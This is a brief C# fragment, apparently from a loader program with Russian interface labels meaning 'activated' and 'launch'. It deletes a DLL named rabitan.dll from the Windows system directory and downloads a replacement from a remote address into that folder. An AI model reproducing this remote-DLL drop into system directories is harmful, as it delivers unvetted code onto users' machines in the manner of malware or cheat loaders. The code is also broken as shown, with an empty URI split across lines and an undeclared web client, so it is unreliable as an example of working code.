System.IO.File.Delete(Environment.SystemDirectory + "\\rabitan.dll");
Uri address = new Uri("
");
string fileName = Environment.SystemDirectory + "\\rabitan.dll";
webClient.DownloadFileAsync(address, fileName);
this.monoFlat_Label2.ForeColor = Color.Green;
this.monoFlat_Label2.Text = "Активирован";
this.monoFlat_Button2.Text = "Запуск";